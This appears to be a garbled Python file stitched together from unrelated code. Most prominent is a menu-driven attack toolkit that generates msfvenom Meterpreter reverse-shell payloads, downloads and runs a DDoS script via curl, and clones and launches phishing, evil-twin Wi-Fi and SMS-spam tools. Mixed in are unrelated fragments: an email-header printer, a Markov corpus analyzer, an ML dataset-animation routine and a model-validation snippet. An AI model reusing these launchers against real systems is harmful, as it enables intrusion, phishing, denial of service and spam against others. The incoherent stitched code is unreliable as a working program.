def decoracion(): purple() # hola print(" | 1 -->> MsfVenom") print(" | 2 -->> DDoS") print(" | 3 -->> Phishing") print(" | 4 -->> Wpscan") print(" | 5 -->> EvilTrust") print(" | 6 -->> Spam SMS") print(" | 7 -->> Exit") option = input(" +-> ") if option == "1": msf() if option == "2": ddos() if option == "3": phishing() if option == "4": wpscan() if option == "5": eviltrust() if option == "6": sms() if option == "7": os.system("clear") exit()
def sms(): os.system("clear") red() print(banner) purple() print(" | 1 -->> Download Tool") print(" | 2 -->> Execute Tool") print(" | 3 -->> Exit") option = input(" +-> ") if option == "1": print("Downloading...") yellow() os.system("git clone https://github.com/Darkmux/SETSMS") red() print("Downloaded!") time.sleep(2) while True: sms() if option == "2": os.system("mv SETSMS/* .") os.system("chmod 777 SETSMS.sh") os.system("bash SETSMS.sh") if option == "3": start_menu()
def eviltrust(): os.system("clear") red() print(banner) purple() print(" | 1 -->> Download Tool") print(" | 2 -->> Execute Tool") print(" | 3 -->> Exit") option = input(" +-> ") if option == "1": print("Downloading...") yellow() os.system("git clone https://github.com/s4vitar/evilTrust") red() print("Downloaded!") time.sleep(2) while True: eviltrust() if option == "2": os.system("mv evilTrust/* .") os.system("clear") os.system("sudo bash evilTrust.sh -m terminal") if option == "3": start_menu()
def phishing(): os.system("clear") red() print(banner) purple() print(" | 1 -->> Download Tool") print(" | 2 -->> Execute tool") print(" | 3 -->> Exit") x = input(" ↳ ") print("") if x == "1": yellow() os.system("git clone https://github.com/htr-tech/zphisher") print("") red() print("Downloaded!!") time.sleep(1) while True: phishing() if x == "2": print("") os.system("mv zphisher/* .") os.system("mv zphisher/.sites .") os.system("bash zphisher.sh") if x == "3": start_menu()
def ddos(): os.system("clear") red() print(banner) purple() print(" | 1 -->> Download Tool") print(" | 2 -->> Execute tool") print(" | 3 -->> Exit") x = input(" ↳ ") print("") if x == "1": yellow() print("") print("Downloading...") os.system( "curl https://raw.githubusercontent.com/yorkox0/exaple01/main/ddos.py -o ddos.py" ) red() print("Downloaded!!") time.sleep(2) while True: ddos() if x == "2": print("") os.system("python3 ddos.py") if x == "3": start_menu()
def msf(): os.system("clear") red() print(banner) purple() print(" | 1 -->> Windows reverse shell") print(" | 2 -->> Linux reverse shell x86") print(" | 3 -->> Linux reverse shell x64") print(" | 4 -->> Exit") x = input(" ↳ ") if x == "1": print("") ip = input("IP -->> ") port = input("PORT ->> ") yellow() print("Creating payload...") os.system("msfvenom -p windows/meterpreter/reverse_tcp LHOST=" + ip + " LPORT=" + port + " -f exe > download.exe") red() print("FileName == download.exe") time.sleep(2) while True: msf() if x == "2": print("") ip = input("IP -->> ") port = input("PORT ->>") yellow() print("Creating payload...") os.system("msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=" + ip + " LPORT=" + port + " -f elf > downloadx86.elf") red() print("FileName == downloadx86.elf") time.sleep(2) while True: msf() if x == "3": print("") ip = input("IP -->> ") port = input("PORT ->> ") yellow() print("Creating payload...") os.system("msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=" + ip + " LPORT=" + port + " -f elf > downloadx64.elf") red() time.sleep(2) print("FileName == downloadx64.elf") while True: msf() if x == "4": start_menu()
def basic_parse(self): print(bold(blue("[To]")), (":").rjust(11), self.eml["To"]) print(bold(green("[From]")), (":").rjust(9), self.eml["From"]) print(bold(yellow("[Sender]")), (":").rjust(7), self.eml["Sender"]) print(bold(orange("[Delivered To]")), ":", self.eml["Delivered-To"]) print(bold(red("[Subject]")), (":").rjust(6), self.eml["Subject"]) print(bold(purple("[Date]")), (":").rjust(9), self.eml["Date"]) print(bold(grey("[Content-Type]")), (":").rjust(1), self.eml["Content-Type"])
def wpscan(): os.system("clear") red() print(banner) blue() print("") purple() web = input("Web whith https:// -->> ") yellow() print("Do you want to save it on web.txt? y/n") if input("-->> ") == "y": os.system("wpscan --url " + web + ">> web.txt") red() print("Saved!!") time.sleep(1) while True: start_menu() else: os.system("wpscan --url " + web) red() input("Press INTRO to exit") while True: start_menu()
def analyze_corpus(self, max_chains): """ Analyzes the corpuses and generates a number of word locations to use for assessing probabilities :param max_chains: the maximum number of links in a chain the corpus needs to be able to generate :return: an array of arrays - each inner array holds key-value pairs, where the key is a history of words, and and the value is the index of the word that appears subsequently """ if max_chains < 2: raise ValueError( "Chain length must be at least 2 (two is not recommended tho)") # # NOTE: It seems more time efficient to just generate new chaining data, as bringing a 50-120MB file into # # memory doesn't seem to be too quick in comparison # chain_data = "bot_files/{0}/{0}_markov_data.json".format(self.handle) # if self.check_markov_data(): # if good enough, load # if os.path.exists(chain_data): # print colors.yellow("retrieving chaining data...\n") # with open(chain_data, "rb") as f: # return json.load(f) print colors.yellow("analyzing corpus...") corpuses = [ [] ] * max_chains # creates bodies of chain occurrences all at once corpuses[0] = self.survey_one_word() print colors.purple("\t1-chaining done") for n in range(1, max_chains): corpuses[n] = self.survey_n_words(n) print colors.purple("\t%s-chaining done" % (n + 1)) print # print colors.yellow("\nstoring...\n") # with open(chain_data, 'wb') as outfile: # json.dump(corpuses, outfile) # for x in corpuses[2]: # see how the data is stored # print ("\"%s\"" % x) + "\t:\t" + str(corpuses[2][x]) return corpuses
def model_nb_plays_generator_with_noise(): step = 40 method = 'sin' # method = 'noise' with_noise = True diff_weights = True run_test = False train_invert = True interp = 10 force_rerun = False mu = 0 sigma = 2 points = 1000 input_dim = 1 # ground truth nb_plays = 20 units = 1 state = 0 activation = None # activation = 'tanh' # predicitons __nb_plays__ = 20 __units__ = 1 __state__ = 0 __activation__ = None # __activation__ = 'tanh' loss_name = 'mse' if method == 'noise': with_noise = True if with_noise is False: mu = 0 sigma = 0 if interp == 1: if run_test is False: if diff_weights is True: base_file_key = 'models_diff_weights' predictions_file_key = 'models_diff_weights_predictions' models_gif_key = 'models_diff_weights_gif' models_snake_gif_key = 'models_diff_weights_snake_gif' models_ts_outputs_gif_key = 'models_diff_weights_ts_outputs_gif' else: base_file_key = 'models' predictions_file_key = 'models_predictions' models_gif_key = 'models_gif' models_snake_gif_key = 'models_snake_gif' models_ts_outputs_gif_key = 'models_ts_outputs_gif' elif run_test is True: if diff_weights is True: base_file_key = 'models_diff_weights_test' predictions_file_key = 'models_diff_weights_test_predictions' models_gif_key = 'models_diff_weights_test_gif' models_snake_gif_key = 'models_diff_weights_test_snake_gif' models_ts_outputs_gif_key = 'models_diff_weights_test_ts_outputs_gif' else: raise elif interp != 1: if run_test is False: if diff_weights is True: if train_invert is False: base_file_key = 'models_diff_weights' models_interp_key = 'models_diff_weights_interp' predictions_file_key = 'models_diff_weights_predictions_interp' models_gif_key = 'models_diff_weights_interp_gif' models_snake_gif_key = 'models_diff_weights_snake_interp_gif' models_ts_outputs_gif_key = 'models_diff_weights_ts_outputs_interp_gif' elif train_invert is True: base_file_key = 'models_diff_weights_interp' models_interp_key = 'models_diff_weights_invert_interp' predictions_file_key = 'models_diff_weights_invert_interp_predictions' models_gif_key = 'models_diff_weights_invert_interp_gif' models_snake_gif_key = 'models_diff_weights_invert_snake_interp_gif' models_ts_outputs_gif_key = 'models_diff_weights_invert_ts_outputs_interp_gif' else: # base_interp_key = 'models_interp' # predictions_file_key = 'models_predictions_interp' # models_gif_key = 'models_interp_gif' # models_snake_gif_key = 'models_snake_interp_gif' # models_ts_outputs_gif_key = 'models_ts_outputs_interp_gif' raise elif run_test is True: if diff_weights is True: base_file_key = 'models_diff_weights_test' models_interp_key = 'models_diff_weights_test_interp' predictions_file_key = 'models_diff_weights_test_predictions_interp' models_gif_key = 'models_diff_weights_test_interp_gif' models_snake_gif_key = 'models_diff_weights_test_snake_interp_gif' models_ts_outputs_gif_key = 'models_diff_weights_test_ts_outputs_interp_gif' else: raise if run_test is True and method == 'sin': method = 'mixed' fname = constants.DATASET_PATH[base_file_key].format(interp=interp, method=method, activation=activation, state=state, mu=mu, sigma=sigma, units=units, nb_plays=nb_plays, points=points, input_dim=input_dim) _inputs, ground_truth = tdata.DatasetLoader.load_data(fname) import ipdb ipdb.set_trace() LOG.debug("Load **ground-truth** dataset from file: {}".format( coloring.cyan(fname))) predicted_fname = constants.DATASET_PATH[predictions_file_key].format( interp=interp, method=method, activation=activation, state=state, mu=mu, sigma=sigma, units=units, nb_plays=nb_plays, points=points, input_dim=input_dim, __activation__=__activation__, __state__=__state__, __units__=__units__, __nb_plays__=__nb_plays__, loss=loss_name) if interp == 1: try: _, predictions = tdata.DatasetLoader.load_data(predicted_fname) LOG.debug("Load **predicted** dataset from file: {}".format( coloring.cyan(predicted_fname))) except FileNotFoundError: LOG.warn("GROUND TRUTH and PREDICTIONS are the SAME dataset") predictions = ground_truth elif interp != 1: models_interp_fname = constants.DATASET_PATH[models_interp_key].format( interp=interp, method=method, activation=activation, state=state, mu=mu, sigma=sigma, units=units, nb_plays=nb_plays, points=points, input_dim=input_dim, __activation__=__activation__, __state__=__state__, __units__=__units__, __nb_plays__=__nb_plays__, loss=loss_name) if force_rerun is False and os.path.isfile(models_interp_fname): LOG.debug("Already interploted...") t_interp = np.linspace(1, points, (int)(interp * points - interp + 1)) _inputs_interp, ground_truth_interp = tdata.DatasetLoader.load_data( models_interp_fname) LOG.debug("Load **ground-truth** dataset from file: {}".format( coloring.purple(models_interp_fname))) try: _, predictions_interp = tdata.DatasetLoader.load_data( predicted_fname) LOG.debug("Load **predicted** dataset from file: {}".format( coloring.cyan(predicted_fname))) except FileNotFoundError: LOG.warn("GROUND TRUTH and PREDICTIONS are the SAME dataset") predictions_interp = ground_truth_interp clip_length = min(predictions_interp.shape[0], _inputs_interp.shape[0]) t_interp = t_interp[:clip_length] _inputs_interp = _inputs_interp[:clip_length] ground_truth_interp = ground_truth_interp[:clip_length] predictions_interp = predictions_interp[:clip_length] else: if train_invert is False: diff = _inputs[1:] - _inputs[:-1] LOG.debug("Max jump between two successive x is {}".format( np.max(np.abs(diff)))) t_ = np.linspace(1, points, points) # f1 = interp1d(t_, _inputs) f2 = interp1d(t_, _inputs, kind='cubic') t_interp = np.linspace(1, points, (int)(interp * points - interp + 1)) _inputs_interp = np.interp(t_interp, t_, _inputs) _inputs_interp = f2(t_interp) clip_length = int((t_interp.shape[0] // input_dim) * input_dim) _inputs_interp = _inputs_interp[:clip_length] # ground_truth_interp = np.interp(_inputs_interp, _inputs, ground_truth, period=1) # predictions_interp = np.interp(_inputs_interp, _inputs, predictions, period=1) _, ground_truth_interp = tdata.DatasetGenerator.systhesis_model_generator( inputs=_inputs_interp, nb_plays=nb_plays, points=t_interp.shape[0], units=units, mu=None, sigma=None, input_dim=input_dim, activation=activation, with_noise=None, method=None, diff_weights=diff_weights) predictions_interp = ground_truth_interp # import matplotlib.pyplot as plt # length = 50 # plt.plot(t_[:length], _inputs[:length], 'o') # plt.plot(t_interp[:interp*length-1], _inputs_interp[:(interp*length-1)], '-x') # plt.show() # plt.plot(t_[:length], ground_truth[:length], 'o') # plt.plot(t_interp[:interp*length-1], ground_truth_interp[:(interp*length-1)], '-x') # plt.show() LOG.debug("Save interploted dataset to file: {}".format( coloring.cyan(models_interp_fname))) tdata.DatasetSaver.save_data(_inputs_interp, ground_truth_interp, models_interp_fname) sys.exit(0) elif train_invert is True: _inputs_interp, ground_truth_interp = ground_truth, _inputs tdata.DatasetSaver.save_data(_inputs_interp, ground_truth_interp, models_interp_fname) LOG.debug("Save interploted dataset to file: {}".format( coloring.cyan(models_interp_fname))) sys.exit(0) _inputs = _inputs_interp ground_truth = ground_truth_interp predictions = predictions_interp models_gif_fname = constants.DATASET_PATH[models_gif_key].format( interp=interp, method=method, activation=activation, state=state, mu=mu, sigma=sigma, units=units, nb_plays=nb_plays, points=points, input_dim=input_dim, __activation__=__activation__, __state__=__state__, __units__=__units__, __nb_plays__=__nb_plays__, loss=loss_name) models_snake_gif_fname = constants.DATASET_PATH[ models_snake_gif_key].format(interp=interp, method=method, activation=activation, state=state, mu=mu, sigma=sigma, units=units, nb_plays=nb_plays, points=points, input_dim=input_dim, __activation__=__activation__, __state__=__state__, __units__=__units__, __nb_plays__=__nb_plays__, loss=loss_name) models_ts_outputs_gif_fname = constants.DATASET_PATH[ models_ts_outputs_gif_key].format(interp=interp, method=method, activation=activation, state=state, mu=mu, sigma=sigma, units=units, nb_plays=nb_plays, points=points, input_dim=input_dim, __activation__=__activation__, __state__=__state__, __units__=__units__, __nb_plays__=__nb_plays__, loss=loss_name) LOG.debug("Write outputs vs. inputs {} into file {}".format( coloring.red("(sequence mode)"), coloring.cyan(models_gif_fname))) outputs = np.vstack([ground_truth, predictions]).T colors = utils.generate_colors(outputs.shape[-1]) inputs = np.vstack([_inputs for _ in range(outputs.shape[-1])]).T # utils.save_animation(inputs, outputs, models_gif_fname, step=step, colors=colors) ##### SNAKE _inputs = np.hstack([_inputs, _inputs]) ground_truth = np.hstack([ground_truth, ground_truth]) predictions = np.hstack([predictions, predictions]) inputs = np.vstack([_inputs for _ in range(outputs.shape[-1])]).T outputs_snake = np.vstack([ground_truth, predictions]).T LOG.debug("Write outputs vs. inputs {} into file {}".format( coloring.red("(snake mode)"), coloring.cyan(models_snake_gif_fname))) utils.save_animation(inputs, outputs_snake, models_snake_gif_fname, step=step, colors=colors, mode="snake") if interp == 1: _inputs = np.arange(points) else: _inputs = t_interp inputs = np.vstack([_inputs for _ in range(outputs.shape[-1])]).T # outputs = np.vstack([ground_truth, predictions]).T LOG.debug("Write outputs vs. ts into file {}".format( coloring.cyan(models_ts_outputs_gif_fname))) utils.save_animation(inputs, outputs, models_ts_outputs_gif_fname, step=points, colors=colors)
from validator import val class SimModel(BaseEstimator, RegressorMixin): def fit(self, X, y): pass def predict(self, X): return X print("testing sim score") local = val(algs=[SimModel()], post=[Average()]) colors.purple(local) colors.green(local["score"]) for model in os.listdir("models"): model = joblib.load(os.path.join("models", model)) local = val(algs=[model], post=[ Average(), CoupleEqualizerFast(), MetricEqualizer(metric="zscore"), MetricEqualizer(metric="percentage"), MetricEqualizer(metric="zscore_median"), MetricEqualizer(metric="percentage_median"), MetricEqualizer(metric="distance"), MetricEqualizer(metric="distance_median") ])
def start_menu(): os.system("clear") red() print(banner) purple() decoracion()